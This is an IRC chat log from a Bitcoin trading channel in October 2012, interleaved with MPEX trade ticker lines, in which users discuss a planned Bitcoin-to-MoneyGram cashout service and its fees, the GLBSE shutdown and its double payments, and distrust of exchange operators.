[MPEX] [S.MPOE] 28800 @ 0.00043455 = 12.515 BTC [-] Oct 19 05:10:00 [MPEX] [S.MPOE] 10256 @ 0.00043225 = 4.4332 BTC [-] Oct 19 05:10:48 thestringpuller did you have something in mind ? Oct 19 05:11:28 i was driving Oct 19 05:11:38 worked late Oct 19 05:11:48 lemme grab a keyboard amd a chair and we will talk Oct 19 05:12:40 AHhhhhhhh... much better. Oct 19 05:12:50 Nothing like a good 'ol qwerty keyboard. Oct 19 05:17:01 Satoshi reaches next level in 0 days, 22:22:00. Oct 19 05:18:06 mircea_popescu, i want to do the withdrawal version of BitInstant, allow for people to send a service BTC's (like fastcash4bitcoins.com) and sends out moneygrams within 10 minutes. The only thing is padding the fees Oct 19 05:19:02 I read some literature on "free as a value proposition" and in order to pad an expense of a service that is free, you have to have something else to make up for it Oct 19 05:19:28 I can't seem to figure out a way to do that with money gram fees (dey such a monopoly) Oct 19 05:29:39 hm Oct 19 05:30:15 i would think your greater problem would be handling money flows. Oct 19 05:30:42 that's handled Oct 19 05:32:05 lol. i meant legally. Oct 19 05:32:15 you'll be getting tons of money in and out. Oct 19 05:33:03 you talking AML? Oct 19 05:33:28 that money service business stuff Oct 19 05:33:55 open a company, apply for MBS license Oct 19 05:35:25 [MPEX] [S.MPOE] 29354 @ 0.00043291 = 12.7076 BTC [+] Oct 19 05:36:12 can't I just write one of https://fastcash4bitcoins.com/Terms.aspx these Oct 19 05:37:10 you really shouldn't be going into something like this w/o a lawyer partner. Oct 19 05:37:15 too many things to fugde up. Oct 19 05:37:33 or go offshore Oct 19 05:37:50 my investor has lawyers on retainer Oct 19 05:37:59 so all the nitty legal stuff is covered Oct 19 05:38:02 kinda lucked out Oct 19 05:38:08 well then you should ask them lol Oct 19 05:38:18 lol (writes it down) Oct 19 05:38:23 run your plan by them, see what they say Oct 19 05:38:24 okay so what about padding the fees? Oct 19 05:38:32 lol Oct 19 05:38:43 I don't think lawyers will have advice on that Oct 19 05:38:46 (well, basically, i will be taking lots of money in (from mtgox ?) and doling it out to many people who paid me btc. what do i do to make it legal ?) Oct 19 05:39:02 a, the fees. Oct 19 05:39:22 hm. Oct 19 05:40:53 for M between 5-50 bucks it 5 dollar fee 55-200 it's 12 dollars 200-500ish it's ~19 Oct 19 05:41:04 for moneygram* Oct 19 05:41:13 damn expensive :\ Oct 19 05:41:22 do cash in mail for < 100 ? Oct 19 05:42:43 hmm, that's 1-2 days vs 10 minutes Oct 19 05:44:00 yeah Oct 19 05:44:03 a sticky issue. Oct 19 05:44:12 only if i were google Oct 19 05:44:26 they were able to make gmail free because of their ad revenue Oct 19 05:45:59 well man... this is one of those problems that'll make the solver rich Oct 19 05:46:11 and meanwhile litter the fields with dead companies. Oct 19 05:46:45 i'ma find away Oct 19 06:00:44 [MPEX] [S.MPOE] 9100 @ 0.00043515 = 3.9599 BTC [+] Oct 19 06:00:45 [MPEX] [S.MPOE] 4365 @ 0.00043721 = 1.9084 BTC [+] Oct 19 06:26:00 [MPEX] [S.MPOE] 46200 @ 0.00043397 = 20.0494 BTC [-] Oct 19 06:26:02 [MPEX] [S.MPOE] 10292 @ 0.00043291 = 4.4555 BTC [-] Oct 19 06:39:52 mircea_popescu: i've crunched numbers for like an hour Oct 19 06:40:11 the best I can do is 10% which is outrageous :\ Oct 19 06:51:23 [MPEX] [S.MPOE] 1435 @ 0.00043721 = 0.6274 BTC [+] Oct 19 07:16:49 [MPEX] [S.MPOE] 600 @ 0.00044 = 0.264 BTC [+] Oct 19 07:43:33 [MPEX] [S.MPOE] 20379 @ 0.00043897 = 8.9458 BTC [-] Oct 19 08:09:02 [MPEX] [S.MPOE] 19921 @ 0.00043577 = 8.681 BTC [-] Oct 19 08:35:18 [MPEX] [S.MPOE] 7300 @ 0.00044 = 3.212 BTC [+] Oct 19 09:00:32 [MPEX] [S.MPOE] 17379 @ 0.00043782 = 7.6089 BTC [-] Oct 19 09:00:33 [MPEX] [S.MPOE] 8964 @ 0.00043531 = 3.9021 BTC [-] Oct 19 09:26:06 [MPEX] [S.MPOE] 40236 @ 0.00043531 = 17.5151 BTC [-] Oct 19 09:51:13 [MPEX] [S.MPOE] 9764 @ 0.00043471 = 4.2445 BTC [-] Oct 19 09:51:14 [MPEX] [S.MPOE] 31700 @ 0.00043734 = 13.8637 BTC [+] Oct 19 09:51:16 [MPEX] [S.MPOE] 9036 @ 0.00044 = 3.9758 BTC [+] Oct 19 10:16:20 [MPEX] [S.MPOE] 15100 @ 0.00043463 = 6.5629 BTC [-] Oct 19 10:41:35 [MPEX] [S.MPOE] 12836 @ 0.00044 = 5.6478 BTC [+] Oct 19 11:06:47 [MPEX] [S.MPOE] 36900 @ 0.00043463 = 16.0378 BTC [-] Oct 19 11:14:45 [MPEX] [S.MPOE] 500000 @ 0.00044 = 220 BTC [+] Oct 19 11:40:08 [MPEX] [S.MPOE] 4600 @ 0.00043463 = 1.9993 BTC [-] Oct 19 12:05:45 [MPEX] [S.MPOE] 4700 @ 0.00043314 = 2.0358 BTC [-] Oct 19 12:31:30 [MPEX] [S.MPOE] 15100 @ 0.00043314 = 6.5404 BTC [-] Oct 19 12:31:32 [MPEX] [S.MPOE] 1532 @ 0.00043415 = 0.6651 BTC [+] Oct 19 12:56:50 [MPEX] [S.MPOE] 13899 @ 0.00043496 = 6.0455 BTC [+] Oct 19 12:56:52 [MPEX] [S.MPOE] 17601 @ 0.00044 = 7.7444 BTC [+] Oct 19 13:13:35 "money gram" ? What is that? Oct 19 13:19:25 .estimate 290 Oct 19 13:21:57 [MPEX] [S.MPOE] 53900 @ 0.00044 = 23.716 BTC [+] Oct 19 13:49:31 [MPEX] [S.MPOE] 4000 @ 0.00043453 = 1.7381 BTC [-] Oct 19 13:49:32 [MPEX] [S.MPOE] 29768 @ 0.00043417 = 12.9244 BTC [-] Oct 19 13:49:34 [MPEX] [S.MPOE] 5632 @ 0.00043291 = 2.4381 BTC [-] Oct 19 13:57:43 is GLBSE sending out double payments? Oct 19 14:15:09 [MPEX] [S.MPOE] 4473 @ 0.00043789 = 1.9587 BTC [+] Oct 19 14:39:55 yes EskimBob Oct 19 14:40:07 EskimoBob they have for some not all Oct 19 14:40:19 and its odd cuz they only ahve enought to pay 90% anyway Oct 19 14:40:35 some get 100% some get 90% some get 1805 and some get 0% Oct 19 14:40:44 180% Oct 19 14:40:48 [MPEX] [S.MPOE] 6497 @ 0.00043291 = 2.8126 BTC [-] Oct 19 14:40:50 [MPEX] [S.MPOE] 41203 @ 0.00043229 = 17.8116 BTC [-] Oct 19 14:41:02 theymos and other owners will ahve to cover the losses Oct 19 14:41:14 what a fail boat glbse has turned into Oct 19 15:06:21 [MPEX] [S.MPOE] 3400 @ 0.00043499 = 1.479 BTC [+] Oct 19 15:31:33 [MPEX] [S.MPOE] 45400 @ 0.0004345 = 19.7263 BTC [-] Oct 19 15:31:35 [MPEX] [S.MPOE] 3927 @ 0.00043789 = 1.7196 BTC [+] Oct 19 15:31:36 [MPEX] [S.MPOE] 6073 @ 0.00044 = 2.6721 BTC [+] Oct 19 15:57:52 [MPEX] [S.MPOE] 22630 @ 0.00043506 = 9.8454 BTC [-] Oct 19 16:23:12 [MPEX] [S.MPOE] 13800 @ 0.00043573 = 6.0131 BTC [+] Oct 19 16:23:13 [MPEX] [S.MPOE] 9670 @ 0.00043506 = 4.207 BTC [-] Oct 19 16:23:14 [MPEX] [S.MPOE] 3630 @ 0.00043435 = 1.5767 BTC [-] Oct 19 16:34:00 Chaang-Noi: it just absurd. All they had to do was keep the damn thing open but close trading except issuer<->client Oct 19 16:34:14 yeah... Oct 19 16:34:19 its a fial boat im glad im not on Oct 19 16:34:33 i guess there is always at least 2 wasy to resolve problems, right, correct and everything else Oct 19 16:35:26 rats do not like sinking boats... theymos khmkk.... Oct 19 16:50:10 [MPEX] [S.MPOE] 29100 @ 0.00043549 = 12.6728 BTC [+] Oct 19 17:16:11 [MPEX] [S.MPOE] 14300 @ 0.00043549 = 6.2275 BTC [+] Oct 19 17:16:12 [MPEX] [S.MPOE] 21112 @ 0.00043538 = 9.1917 BTC [-] Oct 19 17:40:42 what's this double payments thing ?! Oct 19 17:41:18 nefario being dumb Oct 19 17:41:19 [MPEX] [S.MPOE] 4620 @ 0.00043538 = 2.0115 BTC [-] Oct 19 17:42:47 OK, I stand corrected. And if you prefer lulz over doing some research how exactly MPOE is financed, then sorry, I'll rather leave any further discussion to MPOE-PR . Oct 19 17:42:51 ^^ jurov ahaha Oct 19 17:43:17 forums is blowin up? Oct 19 17:43:38 just a little lolz Oct 19 17:43:43 https://bitcointalk.org/index.php?topic=118679.msg1281743#msg1281743 Oct 19 17:43:44 ive stopped checking them since I discovered usagi is incompetent Oct 19 17:45:22 http://live.coinbr.com/?mpsic=S.MPOE Oct 19 17:45:24 this is pretty cool Oct 19 17:46:27 yea Oct 19 17:46:31 he used google.charts Oct 19 17:46:49 can we have access to historical mpex data? Oct 19 17:48:55 the twitter feed ? or what data you mean ? Oct 19 17:53:19 dolphin sex Oct 19 17:55:44 that data is spermanently pealed. Oct 19 18:06:54 [MPEX] [S.MPOE] 22068 @ 0.00043538 = 9.608 BTC [-] Oct 19 18:07:13 permanently pealed? Oct 19 18:08:28 sealed lol Oct 19 18:08:32 it's a multipun. Oct 19 18:17:10 [MPEX] [S.MPOE] 732 @ 0.00043519 = 0.3186 BTC [-] Oct 19 18:17:12 [MPEX] [S.MPOE] 53764 @ 0.00043626 = 23.4551 BTC [+] Oct 19 18:17:13 [MPEX] [S.MPOE] 37900 @ 0.00043715 = 16.568 BTC [+] Oct 19 18:17:14 [MPEX] [S.MPOE] 7604 @ 0.00044 = 3.3458 BTC [+] Oct 19 18:36:14 spoonerism Oct 19 18:42:26 [MPEX] [S.MPOE] 36100 @ 0.00044 = 15.884 BTC [+] Oct 19 18:44:09 So... who's advocating that people keep the double payment for themselve? Oct 19 18:45:23 Doesn't seems to be the answer to me. Oct 19 18:46:06 Kind of taking your personal grudge against Nefario and venging yourself at the detriment of others who are waiting for their funds. Oct 19 18:46:33 Even if yes, most have zero trust in Nefario. Oct 19 18:55:10 theymos said peole should keep the double payments and not give back to nefario Oct 19 18:55:22 however theymos gave a guy a scammers tag just for that months ago Oct 19 18:55:31 theymos... oh man, he has turned out to be a scummy fuck Oct 19 18:57:17 Well what do you know... anonymous people... Oct 19 18:57:34 Is he well known other than as theymos? Oct 19 18:59:11 people i dont trust, mt gox, nefario now theymos... Oct 19 18:59:25 gavin i am not happy about cuz of the name of his foundation.. but other than that fine Oct 19 18:59:30 cassicuss is still cool... Oct 19 18:59:33 but man... Oct 19 18:59:53 Well, it does look like it was an "official" foundation Oct 19 18:59:55 no one left to trust or work with really Oct 19 19:00:08 then it should not be called "the bitcoin foundation" Oct 19 19:00:16 im fine he has a foundation, and i want him to have one Oct 19 19:00:27 just dont call it "the bitcoin foundation" Oct 19 19:00:39 But I mean, most open source project have an "official" foundation which is not technically... well official at all. Oct 19 19:00:40 cuz all it is is the mt gox and bitinstant foundation to pay gavin... Oct 19 19:00:52 i dont like the name Oct 19 19:01:02 it really pisses me off Oct 19 19:01:14 not eveny one agres with me Oct 19 19:01:19 every Oct 19 19:01:58 Well, as the core devs seems to be participating... they're already kind of making things themselve anyway to start with. And been doing a great job. Oct 19 19:02:00 I'm a bit annoyed but don't mind the name too much. Oct 19 19:02:29 The thing is, no one can enforce it and someone will eventually try to claim "Bitcoin Foundation" Oct 19 19:02:48 the should hold the name so no one will use it Oct 19 19:02:52 but they should not use it Oct 19 19:03:08 If they don't use it, they can't hold the name... Oct 19 19:03:14 They need to establish it. Oct 19 19:03:32 Better be the core dev establishing it before some random person makes literal claims to be the official Bitcoin Foundation Oct 19 19:04:11 Would be hard to have "Bitcoin Foundation" registered and enforced in every damn country Oct 19 19:04:23 and the devs don't have the resource for that anyway. Oct 19 19:05:10 It's a wrong doing more good than harm to me. Especially if they establish with the name but keep the claim not to be the official foundation. Oct 19 19:05:38 i understand your point Oct 19 19:06:16 i think they should have set up two differnt foundations then Oct 19 19:06:28 one that more or less did nothing but hold that name Oct 19 19:06:32 id support that with money Oct 19 19:07:08 Donating to get the name enforced would be a solution. Oct 19 19:07:24 Registration might be challenged however. Oct 19 19:07:37 It might not be copyrightable Oct 19 19:07:49 [MPEX] [S.MPOE] 8022 @ 0.00043658 = 3.5022 BTC [-] Oct 19 19:07:50 [MPEX] [S.MPOE] 34078 @ 0.00043615 = 14.8631 BTC [-] Oct 19 19:07:50 Everywhere Oct 19 19:11:47 I see people blindly attacking every authority on thinking and claims basically saying it's all wrong because it doesn't advantage them personally when other takes initiatives for themselves or others. Somehow it should always be for them. Yes there's corruption all around the world, but the majority of people in a position of authority knows what they're doing, have perfectly good Oct 19 19:11:47 reasons to do what they do and are not corrupted. I don't always have the same priorities as them, but I don't go around blindly attacking everyone. Oct 19 19:13:20 Chaaang-Noi: Just curious, why don't you trust Mt Gox? Oct 19 19:14:11 You know, those kind of people that if you'd not claim said authority was innocent or to be agreeing with them, but simply even suggesting there's no proof of anything or bringing forth any reasoning to it, you're automatically part of them and should be publicly executed? Oct 19 19:14:16 they locked down a significant amount of my money and demanded i send in all sorts of docs Oct 19 19:14:26 like address passport wedding certificat Oct 19 19:14:28 bills Oct 19 19:14:34 like loads of crazy shit Oct 19 19:14:39 To only slightly exagerate... yes, that kind of persons... drives me nut. Oct 19 19:14:49 Ahh, well yeah, I suppose that would do it. Oct 19 19:15:55 Chaaang-Noi, I'd expect that from any regulated financial service Oct 19 19:16:08 wedding certificate? Oct 19 19:16:08 To do it at some point with enough volume Oct 19 19:16:26 Maybe. I don't know their local laws and requirements. Oct 19 19:16:26 translated and then certified? Oct 19 19:16:32 they are in japan Oct 19 19:16:38 they did not have to do that Oct 19 19:16:42 there was a thread on it Oct 19 19:16:46 I would expect it going in.. if it wasn't there to begin with I would agree doing it retroactively is suspect. Oct 19 19:16:49 like 3 of them Oct 19 19:17:07 mark called claimed on the forum he had proof i was a "terrorest or money launder" Oct 19 19:17:09 Well, I don't consider bitcointalk.org as a good source of legal advice. Oct 19 19:17:26 uh? Oct 19 19:17:28 no i checked with my bank and my family lawyer Oct 19 19:17:39 Well, odd... Oct 19 19:17:42 they said i could sue for him making it public there was an AML investigation Oct 19 19:17:47 he broke the law Oct 19 19:17:56 That's bad. Oct 19 19:18:00 i knoew Oct 19 19:18:01 i know Oct 19 19:18:09 it was a huge drama about 10 months ago Oct 19 19:18:28 locked my shit down and said he had proof! Oct 19 19:18:40 month later said the case was closed and i got my money Oct 19 19:18:41 so much for proof Oct 19 19:33:39 [MPEX] [S.MPOE] 266 @ 0.00043615 = 0.116 BTC [-] Oct 19 19:59:23 [MPEX] [S.MPOE] 29100 @ 0.00043509 = 12.6611 BTC [-] Oct 19 19:59:25 [MPEX] [S.MPOE] 1000 @ 0.00043435 = 0.4344 BTC [-] Oct 19 20:00:40 The wedding certificate was because your wife was active in your account wasn't she? Oct 19 20:00:51 It wasn't just "hey gimme your wedding certificate" totally out of the blue? Oct 19 20:01:23 Also, did your lawyer tell you he broke the law *of Japan*? Oct 19 20:02:06 Like, specifically.. of Japan.. the place where he's operating in. Oct 19 20:03:38 And what language, specifically, did he use when he said he had "proof"? Or are you paraphrasing again? Oct 19 20:24:25 [MPEX] [S.MPOE] 8200 @ 0.000436 = 3.5752 BTC [+] Oct 19 20:49:34 [MPEX] [S.MPOE] 17034 @ 0.000436 = 7.4268 BTC [+] Oct 19 20:49:34 [MPEX] [S.MPOE] 21037 @ 0.00043805 = 9.2153 BTC [+] Oct 19 21:15:09 [MPEX] [S.MPOE] 63 @ 0.00043805 = 0.0276 BTC [+] Oct 19 21:15:11 [MPEX] [S.MPOE] 47025 @ 0.00044 = 20.691 BTC [+] Oct 19 21:40:26 [MPEX] [S.MPOE] 37700 @ 0.00044 = 16.588 BTC [+] Oct 19 22:07:06 [MPEX] [S.MPOE] 2500 @ 0.00043805 = 1.0951 BTC [-] **** BEGIN LOGGING AT Sat Oct 20 05:00:59 2012 Oct 20 05:01:52 i guess everyone has already seen http://live.coinbr.com/?mpsic=S.MPOE ? Oct 20 05:23:19 [MPEX] [S.MPOE] 4979 @ 0.00043162 = 2.149 BTC [-] Oct 20 05:35:26 mircea_popescu: you are alive Oct 20 05:35:52 yea ? Oct 20 05:36:25 you and smickles have been very helpful Oct 20 05:36:51 for that: thank you Oct 20 05:37:17 hey, yw. Oct 20 05:37:23 what did that smickles character do this time! Oct 20 05:38:03 he let me bounce my ideas off of him Oct 20 05:38:21 advice is worth a lot Oct 20 05:39:18 hehe cool! Oct 20 05:39:18 i may be able to bring the money gram prices to negligible Oct 20 05:40:59 i read more about free models after talking with you Oct 20 05:49:07 [MPEX] [S.MPOE] 26414 @ 0.00043162 = 11.4008 BTC [-] Oct 20 05:50:44 that's always good then! Oct 20 06:13:50 mircea_popescu: so ultimately i came to the conclusion maybe personalized liiquidation solutions would be more affordable for both parties. one peronalized solution would be a bill pay service for rg Oct 20 06:14:15 does this scale ? Oct 20 06:14:17 [MPEX] [S.MPOE] 12500 @ 0.0004338 = 5.4225 BTC [+] Oct 20 06:14:18 [MPEX] [S.MPOE] 31300 @ 0.00043381 = 13.5783 BTC [+] Oct 20 06:14:50 yea like bitpay but its customized i suppose Oct 20 06:15:19 not so much payment as liquidation Oct 20 06:15:30 we need a plugin for quicken or mint.com Oct 20 06:15:45 i can do mint Oct 20 06:16:51 actually a get-btc straight from mint would be great. Oct 20 06:18:51 need to track the prices at the time you use the coins ,capital gains tax etc Oct 20 06:19:27 gives me a headache to think about lol Oct 20 06:19:47 most jurisdiction have sane tax laws Oct 20 06:19:53 (as in, taxable when realised) Oct 20 06:26:45 [MPEX] [O.BTCUSD.P200T] 1000 @ 0.86438937 = 864.3894 BTC [+] Oct 20 06:26:57 [MPEX] [O.BTCUSD.P190T] 920 @ 0.76062356 = 699.7737 BTC [+] Oct 20 06:27:10 [MPEX] [O.BTCUSD.P180T] 880 @ 0.65720131 = 578.3372 BTC [-] Oct 20 06:27:24 [MPEX] [O.BTCUSD.P170T] 740 @ 0.55444696 = 410.2908 BTC [+] Oct 20 06:32:19 alot of puts... Oct 20 06:33:18 noagendamarket: im.actually.working on that for personal.use Oct 20 06:33:20 dun dun dun Oct 20 06:33:42 nice Oct 20 06:33:43 not mint though Oct 20 06:33:55 just using terminal Oct 20 06:44:11 [MPEX] [S.BVPS] 100 @ 0.00300376 = 0.3004 BTC [-] Oct 20 06:44:13 [MPEX] [S.BVPS] 300 @ 0.0033009 = 0.9903 BTC [+] Oct 20 06:51:29 http://pastebin.com/raw.php?i=DRt78Vne Oct 20 06:51:35 if not seen Oct 20 06:54:10 oh Oct 20 06:54:15 european date order Oct 20 06:54:18 was confused there for a bit :) Oct 20 06:57:14 :) Oct 20 06:57:27 btw i did not leak this, its public Oct 20 06:59:25 It really looks like Nefario is chickening out of legal responsibility, trying to make everything disappear. Oct 20 06:59:39 I only saw tidbits quoted before. Oct 20 06:59:40 yeah Oct 20 06:59:45 i dont think anyone is after him Oct 20 06:59:47 BTC-Mining: it is Oct 20 06:59:51 esp since he did not collect aml stuff after all Oct 20 06:59:55 I dunno, at least I bought back half the dmc shares Oct 20 06:59:57 so theres that Oct 20 07:00:19 he wants to pretend that someone is forcing him to do something but i dont think that is the case Oct 20 07:00:27 we are so screwed Oct 20 07:00:52 well i kinda hope the govt does not go after nefario Oct 20 07:01:32 im only 50% done as the log is loooong but it just looks like nefario wants to cover his ass Oct 20 07:01:40 it also looks like more than 50% support him Oct 20 07:02:00 yeah Oct 20 07:02:01 I just Oct 20 07:02:04 dont get it =/ Oct 20 07:02:31 It doesnt make any sense to me :/ Oct 20 07:03:06 Maybe he just cant be bothered anymore Oct 20 07:03:10 lol Oct 20 07:05:38 i think he thinks that if he shuts this down nothing bad will happen to him Oct 20 07:05:50 and if he keeps going he risks one day getting fucked hard by a lot of people Oct 20 07:06:03 lot of govt people Oct 20 07:06:21 i do understand why he is shutting it down Oct 20 07:06:47 but he started this out being very anon and then changed it into what it is today in 3 versions Oct 20 07:06:54 he really fucked up, he did this to himself Oct 20 07:07:02 despite people telling him over and over not to Oct 20 07:07:20 we didnt buy shares in Nefario we bought them in bitcoinglobal. Oct 20 07:07:45 more than 50% of bitcoin global voted to shut down GLBSE Oct 20 07:08:03 are you one of the shareholders noagenda? Oct 20 07:08:18 there was npo point voting though Oct 20 07:08:32 but there was a vote Oct 20 07:10:01 [MPEX] [S.MPOE] 7300 @ 0.00043381 = 3.1668 BTC [+] Oct 20 07:10:02 [MPEX] [S.MPOE] 16061 @ 0.00043401 = 6.9706 BTC [+] Oct 20 07:10:04 [MPEX] [S.MPOE] 20839 @ 0.00043404 = 9.045 BTC [+] Oct 20 07:10:51 He refused to say anything and insists that there won't be any problems? Oct 20 07:11:41 Wouldn't be surprised if he was ordered to shut it down but it was too minor for them to sanction Nefario more than that. Oct 20 07:12:04 https://sphotos-a.xx.fbcdn.net/hphotos-snc6/190343_440022752702093_1392987282_n.jpg Oct 20 07:12:10 Maybe an order to close the website and interdiction to do anything related to securities for some years. Oct 20 07:12:26 Or he's just scared. Oct 20 07:12:32 i think he just got scared Oct 20 07:12:49 Chaang-Noi, where was that link? Oct 20 07:13:01 if he really had some sort of thing with the govt aginst me he would not have sent me back my BTC like a week after he delisted me without my AML stuff Oct 20 07:13:17 was on the forum BTC-Mining from christo i think Oct 20 07:13:36 hes probably less scared of bitcoiners than the government :P Oct 20 07:14:14 unlike keyboard warriors the government can really fuck your shit up Oct 20 07:14:42 yeah why did he send me back BTC if he had the govt involved? Oct 20 07:14:57 Mormons usually endorse republicans? Oct 20 07:18:51 you guys know he did an interview and explained all this right? Oct 20 07:19:38 he explained shit Oct 20 07:20:16 and hes operating in bad faith Oct 20 07:20:52 how else exactly would he shut down cleanly? Oct 20 07:21:34 send double payments? Oct 20 07:21:34 he probably thinks he did Oct 20 07:21:44 its all in his imaginatuion Oct 20 07:22:04 he actually did Oct 20 07:22:08 I know someone who got double paid lol Oct 20 07:22:23 the easy way to do it is just let people withdraw using their account on site Oct 20 07:22:46 yea, would have probably been easier. Oct 20 07:22:47 then there is the way a retard would do it Oct 20 07:22:55 never go full retard Oct 20 07:24:34 Im done covering for nefario and he can dig himself out of his own mess. Oct 20 07:36:32 [MPEX] [S.MPOE] 27400 @ 0.00043204 = 11.8379 BTC [-] Oct 20 07:36:33 [MPEX] [S.MPOE] 26297 @ 0.00043404 = 11.4139 BTC [+] Oct 20 07:36:35 [MPEX] [S.MPOE] 2143 @ 0.00043493 = 0.9321 BTC [+] Oct 20 08:01:54 [MPEX] [S.MPOE] 9534 @ 0.00043162 = 4.1151 BTC [-] Oct 20 08:01:56 [MPEX] [S.MPOE] 29012 @ 0.00043145 = 12.5172 BTC [-] Oct 20 08:01:57 [MPEX] [S.MPOE] 12954 @ 0.00043115 = 5.5851 BTC [-] Oct 20 08:27:00 [MPEX] [S.MPOE] 24099 @ 0.00043115 = 10.3903 BTC [-] Oct 20 08:27:02 [MPEX] [S.MPOE] 4701 @ 0.0004306 = 2.0243 BTC [-] Oct 20 08:52:50 [MPEX] [S.MPOE] 19748 @ 0.00043165 = 8.5242 BTC [+] Oct 20 08:52:52 [MPEX] [S.MPOE] 37507 @ 0.0004306 = 16.1505 BTC [-] Oct 20 09:17:54 [MPEX] [S.MPOE] 46557 @ 0.00043493 = 20.249 BTC [+] Oct 20 09:17:56 [MPEX] [S.MPOE] 3416 @ 0.00043601 = 1.4894 BTC [+] Oct 20 09:17:57 [MPEX] [S.MPOE] 3598 @ 0.0004368 = 1.5716 BTC [+] Oct 20 09:17:58 [MPEX] [S.MPOE] 2029 @ 0.00043682 = 0.8863 BTC [+] Oct 20 09:44:30 [MPEX] [S.MPOE] 52300 @ 0.00043447 = 22.7228 BTC [-] Oct 20 09:44:31 [MPEX] [S.MPOE] 1700 @ 0.0004306 = 0.732 BTC [-] Oct 20 10:11:02 [MPEX] [S.MPOE] 2400 @ 0.00043215 = 1.0372 BTC [+] Oct 20 10:36:12 [MPEX] [S.MPOE] 19000 @ 0.00043215 = 8.2109 BTC [+] Oct 20 11:02:20 [MPEX] [S.MPOE] 12700 @ 0.00043215 = 5.4883 BTC [+] Oct 20 11:28:02 [MPEX] [S.MPOE] 10962 @ 0.00043215 = 4.7372 BTC [+] Oct 20 11:53:44 [MPEX] [S.MPOE] 6248 @ 0.00043272 = 2.7036 BTC [+] Oct 20 12:19:06 [MPEX] [S.MPOE] 26152 @ 0.00043272 = 11.3165 BTC [+] Oct 20 12:19:08 [MPEX] [S.MPOE] 25648 @ 0.00043333 = 11.114 BTC [+] Oct 20 12:44:15 [MPEX] [S.MPOE] 9738 @ 0.00043215 = 4.2083 BTC [-] Oct 20 12:44:17 [MPEX] [S.MPOE] 25562 @ 0.00043167 = 11.0343 BTC [-] Oct 20 13:09:17 [MPEX] [S.MPOE] 20000 @ 0.00043333 = 8.6666 BTC [+] Oct 20 13:37:01 [MPEX] [S.MPOE] 338 @ 0.00043167 = 0.1459 BTC [-] Oct 20 13:37:02 [MPEX] [S.MPOE] 26062 @ 0.00043133 = 11.2413 BTC [-] Oct 20 14:02:02 [MPEX] [S.MPOE] 13438 @ 0.00043133 = 5.7962 BTC [-] Oct 20 14:02:03 [MPEX] [S.MPOE] 28961 @ 0.00043066 = 12.4723 BTC [-] Oct 20 14:02:04 [MPEX] [S.MPOE] 4393 @ 0.0004306 = 1.8916 BTC [-] Oct 20 14:02:05 [MPEX] [S.MPOE] 4958 @ 0.00043057 = 2.1348 BTC [-] Oct 20 14:27:11 [MPEX] [S.MPOE] 15042 @ 0.00043057 = 6.4766 BTC [-] Oct 20 14:27:12 [MPEX] [S.MPOE] 7900 @ 0.00043036 = 3.3998 BTC [-] Oct 20 14:27:13 [MPEX] [S.MPOE] 8700 @ 0.0004303 = 3.7436 BTC [-] Oct 20 14:27:14 [MPEX] [S.MPOE] 6660 @ 0.00043024 = 2.8654 BTC [-] Oct 20 14:53:03 [MPEX] [S.MPOE] 5200 @ 0.00043333 = 2.2533 BTC [+] Oct 20 15:16:06 did I miss anything interesting? Oct 20 15:16:12 [MPEX] [O.BTCUSD.P120T] 731 @ 0.10257112 = 74.9795 BTC [-] Oct 20 15:42:03 [MPEX] [S.MPOE] 28224 @ 0.00043047 = 12.1496 BTC [-] Oct 20 15:59:45 http://thatsmathematics.com/blog/archives/102 Oct 20 16:09:46 [MPEX] [S.MPOE] 5732 @ 0.00043134 = 2.4724 BTC [+] Oct 20 16:35:00 [MPEX] [S.MPOE] 7368 @ 0.00043134 = 3.1781 BTC [+] Oct 20 16:35:02 [MPEX] [S.MPOE] 16732 @ 0.0004312 = 7.2148 BTC [-] Oct 20 17:00:36 [MPEX] [O.BTCUSD.P120T] 9 @ 0.10121872 = 0.911 BTC [-] Oct 20 17:27:27 [MPEX] [S.MPOE] 6944 @ 0.0004312 = 2.9943 BTC [-] Oct 20 17:27:29 [MPEX] [S.MPOE] 40556 @ 0.00043065 = 17.4654 BTC [-] Oct 20 17:56:16 [MPEX] [S.MPOE] 15844 @ 0.00043065 = 6.8232 BTC [-] Oct 20 17:56:18 [MPEX] [S.MPOE] 6740 @ 0.00043024 = 2.8998 BTC [-] Oct 20 17:56:19 [MPEX] [S.MPOE] 24316 @ 0.00043016 = 10.4598 BTC [-] Oct 20 18:22:03 [MPEX] [S.MPOE] 18272 @ 0.00043288 = 7.9096 BTC [+] Oct 20 18:47:08 [MPEX] [S.MPOE] 2828 @ 0.00043313 = 1.2249 BTC [+] Oct 20 18:47:09 [MPEX] [S.MPOE] 47872 @ 0.00043261 = 20.7099 BTC [-] Oct 20 19:12:17 [MPEX] [S.MPOE] 6528 @ 0.00043261 = 2.8241 BTC [-] Oct 20 19:40:00 [MPEX] [S.MPOE] 48413 @ 0.00043167 = 20.8984 BTC [-] Oct 20 19:40:01 [MPEX] [S.MPOE] 1469 @ 0.00043333 = 0.6366 BTC [+] Oct 20 19:40:02 [MPEX] [S.MPOE] 4018 @ 0.00043335 = 1.7412 BTC [+] Oct 20 19:53:00 in like a day this is the only post here http://thatsmathematics.com/blog/archives/102 Oct 20 19:53:08 its a good post but no one even responded Oct 20 19:53:31 this is a dead or soon to be dead chan Oct 20 19:54:09 no you're just on ignore ;) Oct 20 20:05:26 [MPEX] [S.MPOE] 16589 @ 0.00043016 = 7.1359 BTC [-] Oct 20 20:05:28 [MPEX] [S.MPOE] 16511 @ 0.00042997 = 7.0992 BTC [-] Oct 20 20:18:43 lol ;) Oct 20 20:30:59 [MPEX] [S.MPOE] 189 @ 0.00042997 = 0.0813 BTC [-] Oct 20 20:31:01 [MPEX] [S.MPOE] 34211 @ 0.00042963 = 14.6981 BTC [-] Oct 20 20:56:08 [MPEX] [S.MPOE] 32482 @ 0.00043335 = 14.0761 BTC [+] Oct 20 20:56:09 [MPEX] [S.MPOE] 11218 @ 0.00043376 = 4.8659 BTC [+] Oct 20 21:04:26 anyone alive out there? Oct 20 21:04:41 I am Oct 20 21:05:42 I'm attempting to launch a service tonight Oct 20 21:21:22 [MPEX] [S.MPOE] 24000 @ 0.00043192 = 10.3661 BTC [-] Oct 20 21:26:24 thestringpuller: what kind of? Oct 20 21:46:35 [MPEX] [S.MPOE] 15789 @ 0.00042963 = 6.7834 BTC [-] Oct 20 21:46:36 [MPEX] [S.MPOE] 22111 @ 0.00042951 = 9.4969 BTC [-] Oct 20 22:02:18 FabianB_: I'm launching a liquidation service. The main product is turning bitcoins into cash via moneygram within 1 hour Oct 20 22:02:50 the side product is personalized liquidity solutions for people who need to pay expenses in bitcoin but don't want to deal with fiat at all Oct 20 22:03:55 hopefully rg will be my first client for that latter Oct 20 22:09:05 so.i can't 